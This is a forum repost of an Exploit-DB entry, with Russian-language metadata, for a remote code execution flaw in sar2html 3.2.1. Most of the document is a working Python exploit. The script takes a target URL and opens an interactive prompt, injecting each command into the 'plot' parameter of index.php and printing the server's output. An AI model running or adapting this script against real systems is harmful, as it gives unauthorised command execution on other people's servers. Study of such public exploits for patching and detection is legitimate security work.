Exploit sar2html 3.2.1 - 'plot' Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
49344
Проверка EDB
  1. Пройдено
Автор
MUSYOKA IAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2021-01-04
sar2html 3.2.1 - 'plot' Remote Code Execution
Код:
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()
 
Источник
www.exploit-db.com

Похожие темы